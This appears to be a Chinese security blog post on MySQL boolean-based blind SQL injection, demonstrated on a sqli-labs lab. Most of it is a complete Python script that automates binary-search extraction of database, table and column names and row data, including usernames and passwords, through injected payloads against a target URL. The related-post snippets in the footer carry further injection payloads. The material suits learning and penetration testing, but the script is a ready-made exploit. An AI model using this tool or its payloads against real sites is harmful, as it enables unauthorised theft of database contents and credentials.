mysql 布尔型盲注,SQL注入之布尔型注入(MySQL)

最新推荐文章于 2022-03-16 10:57:56 发布
最新推荐文章于 2022-03-16 10:57:56 发布
阅读量343 收藏
点赞数
文章标签: mysql 布尔型盲注

0x00 特点

当页面存在注入,但是没有显示位,且没有用echo "mysql_error()"输出错误信息时可以用,

它一次只能猜测一个字节,速度慢,但是只要存在注入就能用

0x01 利用方式

用and连接前后语句:www.xxx.com/aa.php?id=1 and (注入语句) --+

根据返回页面是否相同来得到数据

0x02 注入步骤

找到注入点,判断闭合字符

08f674720841e047b52eb04d6fdd1433.png

尝试猜解列数,得到显示位

22c6c206ce434db86fc3e6f3e5f4e1bf.png

9a1c2c5604c9844f2f1755163a1e5b18.png

得到数据库名

41073937bac36a1acff998aa5df5a8e8.png

62d26c36eb316a6e991b5b4eb0013843.png

最终得到第五个数据库名为security

得到表名

6c03489434ddd9fc0c1162fd8c3a2326.png

c0e0ff8a5ff41e57c864c113af9c9c20.png

最终依次猜的表名为users

得到列名

e0ec62944b357f0d2665c9e69c050656.png

62bf5124a21c11a8d044cc076112e846.png

791ddcc9dd8381002f42cd01bc4ea74b.png

同理最终得到第2列列名为username,第3列列名为password

得到列值

65a577f79760ba71039694eafabcd2e8.png

548e04819bfa211b6a93851ee8389aef.png

0d34309e01fea1ad38de85a1aba04389.png

依次得到为admin4,同理可得其他数据

0x04 附上python脚本

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# code by reber <1070018473@qq.com>

__author__="reber"

import sys

import requests

import binascii

import hashlib

from pyfiglet import figlet_format

from optparse import OptionParser

def get_md5_html(url):

html = requests.get(url=url).content

m2 = hashlib.md5()

m2.update(html)

md5_html = m2.hexdigest()

return md5_html

def get2(*args): #二分法得到数值

low,high,url,payload,standard_md5 = args

while low <= high:

mid = (low + high)/2;

mid_url = url + payload.format(mid=mid)

mid_md5_html = get_md5_html(mid_url)

if standard_md5 == mid_md5_html:

low = mid + 1

else:

high = mid-1

num = (low+high+1)/2

return num

def getAllDatabases(url):

standard_md5 = get_md5_html(url)

# print standard_md5

payload = "' and ((select count(distinct+table_schema) from information_schema.tables) > {mid})--+"

# payload = payload.replace(' ','%20')

db_num = get2(1,100,url,payload,standard_md5)

print "The total number of database is: %d" % db_num

for index in xrange(0,db_num): #一次循环输出一个数据库名

payload = "' and (length((select distinct table_schema from information_schema.tables limit {index},1)) > {mid})--+".format(index=index,mid='{mid}')

# payload = payload.replace(' ','%20')

db_name_len = get2(1,30,url,payload,standard_md5)

# print "database name length:%d" % db_name_len

print "[*] ",

for x in xrange(1,db_name_len+1): #一次for循环输出数据库名的一个字符

payload = "' and (select ascii(substr((select distinct table_schema from information_schema.tables limit {index},1), {x}, 1)) > {mid}) --+".format(index=index,x=x,mid='{mid}')

# payload = payload.replace(' ','%20')

str_ascii = get2(32,126,url,payload,standard_md5)

database_name_one_str = chr(str_ascii)

# print database_name_one_str

sys.stdout.write(database_name_one_str)

sys.stdout.flush()

print

def getAllTablesByDb(url,db_name):

standard_md5 = get_md5_html(url)

db_name_hex = "0x" + binascii.b2a_hex(db_name)

# print standard_md5

payload = "' and ((select count(distinct+table_name) from information_schema.tables where table_schema={db_name_hex}) > {mid})--+".format(db_name_hex=db_name_hex,mid='{mid}')

# payload = "/**/".join(payload.split())

db_num = get2(1,200,url,payload,standard_md5)

print "Database %s: [%d tables]" % (db_name,db_num)

for index in xrange(0,db_num): #一次循环输出一个表名

payload = "' and (length((select distinct table_name from information_schema.tables where table_schema={db_name_hex} limit {index},1)) > {mid})--+".format(db_name_hex=db_name_hex,index=index,mid='{mid}')

payload = "/**/".join(payload.split())

table_name_len = get2(1,30,url,payload,standard_md5)

print "[*] ",

for x in xrange(1,table_name_len+1): #一次for循环输出表名的一个字符

payload = "' and (select ascii(substr((select distinct table_name from information_schema.tables where table_schema={db_name_hex} limit {index},1), {x}, 1)) > {mid}) --+".format(db_name_hex=db_name_hex,index=index,x=x,mid='{mid}')

# payload = "/**/".join(payload.split())

str_ascii = get2(32,126,url,payload,standard_md5)

table_name_one_str = chr(str_ascii)

sys.stdout.write(table_name_one_str)

sys.stdout.flush()

print

def getAllColumnsByTable(url,table_name,db_name):

#for循环,一次得到一列的列名:

#while循环得到列名的长度:

#for循环,一次得出列名的一个字符

standard_md5 = get_md5_html(url)

table_name_hex = "0x" + binascii.b2a_hex(table_name)

db_name_hex = "0x" + binascii.b2a_hex(db_name)

# print standard_md5

payload = "' and ((select count(distinct+column_name) from information_schema.columns where table_name={table_name_hex} and table_schema={db_name_hex}) > {mid})--+".format(table_name_hex=table_name_hex,db_name_hex=db_name_hex,mid='{mid}')

# payload = "/**/".join(payload.split())

column_num = get2(1,200,url,payload,standard_md5)

print "Table %s: [%d columns]" % (table_name,column_num)

for index in xrange(0,column_num): #一次循环输出一个列名

payload = "' and (length((select distinct column_name from information_schema.columns where table_name={} and table_schema={} limit {},1)) > {})--+".format(table_name_hex,db_name_hex,index,'{mid}')

# payload = "/**/".join(payload.split())

column_name_len = get2(1,30,url,payload,standard_md5)

# print "column length is: %d" % column_name_len

print "[*] ",

for x in xrange(1,column_name_len+1): #一次for循环输出列名的一个字符

payload = "' and (select ascii(substr((select distinct column_name from information_schema.columns where table_name={} and table_schema={} limit {},1), {}, 1)) > {}) --+".format(table_name_hex,db_name_hex,index,x,'{mid}')

# payload = "/**/".join(payload.split())

str_ascii = get2(32,126,url,payload,standard_md5)

column_name_one_str = chr(str_ascii)

sys.stdout.write(column_name_one_str)

sys.stdout.flush()

print

def getAllcontent(url,column_name,table_name,db_name):

#for循环,一次得到一行的值

#while循环得到每个字段的长度

#for循环,一次得出一个字段的一个字符

column_name = column_name.split(',')

len_column_name = len(column_name)

# print "len_column_name:%d" % len_column_name

standard_md5 = get_md5_html(url)

table_name_hex = "0x" + binascii.b2a_hex(table_name)

db_name_hex = "0x" + binascii.b2a_hex(db_name)

# print standard_md5

payload = "' and ((select count(*) from {}.{}) > {})--+".format(db_name,table_name,'{mid}')

payload = "/**/".join(payload.split())

column_value_num = get2(1,10000,url,payload,standard_md5)

print "The %s table with %d row value: " % (table_name,column_value_num)

stri = ""

for x in xrange(0,len_column_name):#输出title

stri += "%s\t" % column_name[x]

print stri

for index in xrange(0,column_value_num): #一次循环输出一行数据

for y in xrange(0,len_column_name): #一次输出一行的一列的值,循环完输出一行的值

payload = "' and (length((select {} from {}.{} limit {},1)) > {})--+".format(column_name[y],db_name,table_name,index,'{mid}')

# payload = "/**/".join(payload.split())

column_value_len = get2(1,30,url,payload,standard_md5)

# print "column value length is: %d" % column_value_len

for x in xrange(1,column_value_len+1): #得到一行数据的一列的值

payload = "' and (select ascii(substr((select {} from {}.{} limit {},1), {}, 1)) > {}) --+".format(column_name[y],db_name,table_name,index,x,'{mid}')

# payload = "/**/".join(payload.split())

str_ascii = get2(32,126,url,payload,standard_md5)

column_name_one_str = chr(str_ascii)

sys.stdout.write(column_name_one_str)

sys.stdout.flush()

sys.stdout.write("\t")

print

def main():

print figlet_format("sql-bool")

parser = OptionParser(usage='Usage: python %prog [options]',version='%prog 1.2')

parser.add_option("-u","--URL",action="store",

type="string",dest="url",

help="target url")

parser.add_option("-D","--DB",action="store",

type="string",dest="db_name",

help="get database name")

parser.add_option("-T","--TBL",action="store",

type="string",dest="table_name",

help="get table name")

parser.add_option("-C","--COL",action="store",

type="string",dest="column_name",

help="get column name")

parser.add_option("--dbs",action="store_true",

dest="dbs",help="get all database name")

(options,args) = parser.parse_args()

if options == None or options.url == None:

parser.print_help()

elif options.column_name and options.table_name and options.db_name:

getAllcontent(options.url,options.column_name,options.table_name,options.db_name)

elif options.table_name and options.db_name:

getAllColumnsByTable(options.url,options.table_name,options.db_name)

elif options.db_name:

getAllTablesByDb(options.url,options.db_name)

elif options.dbs:

getAllDatabases(options.url)

elif options.url:

parser.print_help()

if __name__ == '__main__':

main()

#python test.py -u "http://192.168.188.134/sqli/Less-8/?id=1" --dbs

#python test.py -u "http://192.168.188.134/sqli/Less-8/?id=1" -D security

#python test.py -u "http://192.168.188.134/sqli/Less-8/?id=1" -D security -T users

#python test.py -u "http://192.168.188.134/sqli/Less-8/?id=1" -D security -T users -C username,password

若未作声明则文章版权归本人(@reber)所有,转载请注明原文链接:

梁大发
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL布尔注入
ZccAc的博客
09-16 422
MYSQL布尔注入 原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。 获取数据库名长度 http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length(database())=8# 获取数据库名 http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid(database(),1,1))=115.
sql注入知识---布尔盲注
尘玥的故事
04-08 534
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
MySQL布尔盲注
一个普普通通的博客
03-01 1474
Mysql注入布尔盲注
布尔盲注新姿势
Lemon's blog
02-23 383
前言: 之前的布尔盲注都是在很正常的情况下进行注入,这次做了一道布尔盲注的题目,学到了不少知识,记录一下。 0x00:regexp正则表达式注入 测试发现username=1' or 1=1#时回显密码错误,密码测试绕不过去,使用布尔盲注试试 没有反应,说明应该是substr函数被禁用了,那该怎么进行猜测,之前的方法都是通过这个函数进行截取然后判断,既然给禁用了就说明应该还有其他的函数可以进行...
sql注入——布尔注入
Night_time的博客
05-04 5074
以sqli-labs-master 闯关游戏第八关为例: 第一步:判断注入点 ?id=1' and 1=2-- - //页面显示异常 ?id=1' and 1=1-- - //页面正常显示 第二步:判断是什么类注入点 构建报错语句: ?id=1' and updatexml(1,0x7e,1)-- - 页面无显示,那就不是报错注入: 那就判断是不是布尔注入,首...
MySQL 面试题-SQL注入篇.docx
09-17
- 推测SQL注入盲注):攻击者通过观察系统响应时间或状态来获取信息,包括布尔盲注和时间盲注。 - 带外SQLi:利用DBMS的特殊功能,如发起HTTP/DNS请求,来传递攻击结果。 - 数值与字符注入:根据输入参数的...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
最新发布
03-27
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
sql注入讲解ppt.pptx
08-10
4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果...
mysql-blind(高级盲注+基于布尔).docx
01-23
MySQL盲注,特别是布尔盲注,是一种在目标页面无明显回显时检测SQL注入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。盲注主要分为基于时间、布尔和错误的三种类...
node-mysql中防止SQL注入的方法总结
09-09
这些函数会确保字符串、日期、布尔值等类的输入被安全地转换为SQL兼容的格式,避免了SQL注入的风险。例如: ```javascript var userId = 1, name = 'test'; var query = connection.query('SELECT * FROM users...
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
webug-布尔注入
我只会装360的博客
09-17 860
布尔注入盲注之一,进行sql语句注入后,选择的数据并不能返回到前端。只能利用其他方法来判断,还是简单介绍下学到的知识点。 left(database(),n)    database() 数据库名称 left()函数表示截取数据库左侧n个字符 substr(a,b,c)      从字符串a的b位置开始截取c个字符,当b为负数时截取位置是从字符串a右端向左数b个字符 mid(a,b,c) ...
渗透(五)之MySQL布尔注入
qq_32719221的博客
09-12 853
SQL盲注–bool注入 布尔盲注的原理 后端不往前端返回具体的数据库的值,通过页面显示正常与否,判断SQL注入的值是否为真。 布尔盲注方法: 针对sqli-labs/less-8 一开始: 当url为 127.0.0.1/less-8/?id=1 对应的SQL语句 SELECT * FROM users WHERE id = ‘1’ LIMIT 0,1 先测试系统有无SQL注入漏洞 当ur...
浅谈盲注中的基于时间布尔注入方法
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
MYSQL布尔盲注手工注入笔记
GiDunPar的博客
02-02 1164
布尔盲注就是存在注入的页面没有回显,没办法用select 1,2,3....#来判断页面的回显 只能用对和错了一点一点注入 用到的函数: length(str) 返回指定字符串的长度 substr(str,pos,len)/substring(str,pos,len)...
sql注入布尔注入--实验吧-认真一点啊!
qq_25987491的博客
04-24 1986
原文:https://www.jianshu.com/p/11f409992681先简单地试试,发现输入1会回显You are in,输入其他会回显You are not in,而输入1'也会回显You are not in,这说明单引号没有被吃掉,还可以使用。继续测试发现过滤了and、空格和|,or没有被过滤。构造id=1'or%0a'1或者id=1'or/**/'1,看到的回显却是You ar...
针对MYSQL手工盲注的步骤
cbhjerry的博客
01-30 8822
一、基于布尔盲注: 1.判断是否存在注入注入是字符还是数字,例:1 or 1=1,1' or '1'='1 2.猜解当前数据库名,例:猜长度 and length(database())=1 #,逐个猜字符and ascii(substr(databse(),1,1))>97# 3.猜解数据库中的表名,例:猜表数量  and (select count (table_name) fr
SQL盲注--基于布尔注入 2018/11/14
weixin_43689084的博客
11-14 655
在一些站点隐藏了错误信息的情况下,联合查询以及报错注入的方法均无法注入出数据的时候,需要用到盲注的方法来进行注入。 基于布尔盲注是根据页面差来进行判断和数据注入的。在存在注入的页面输入and(true)则返回页面1;输入and(2)则返回页面2.而页面1和页面2有差别,常见的情况是页面1是正常页面,页面2是错误页面。 substr(str,pos,len):将str从pos...
SQL注入-基于布尔盲注
Snowflake1997的博客
02-19 1353
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-8。访问的URL为: http://[靶机IP]/sqli-labs/Less-8/ 登录后,根据网页提示,给定一个?id=1的参数,即: http://[靶机IP]/sqli-labs/Less-8/?id=1 此时页面显示You are in...,显示状态未True。 如果给定一个?id=-1的参数,即: http:/.
C语言 数据类布尔
07-14
C语言中没有直接的布尔数据类。通常情况下,用整数类来模拟布尔数据。在C语言中,0表示假(false),非零值表示真(true)。你可以使用标准库中的stdbool.h头文件来定义布尔,并使用bool作为关键字来表示布尔。 以下是一个使用布尔的示例: ```c #include <stdbool.h> #include <stdio.h> int main() { bool isTrue = true; bool isFalse = false; if (isTrue) { printf("isTrue is true\n"); } if (!isFalse) { printf("isFalse is false\n"); } return 0; } ``` 在上面的示例中,我们使用了`stdbool.h`头文件来定义布尔,并声明了两个布尔变量`isTrue`和`isFalse`。通过条件判断,我们可以对布尔变量进行逻辑判断。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值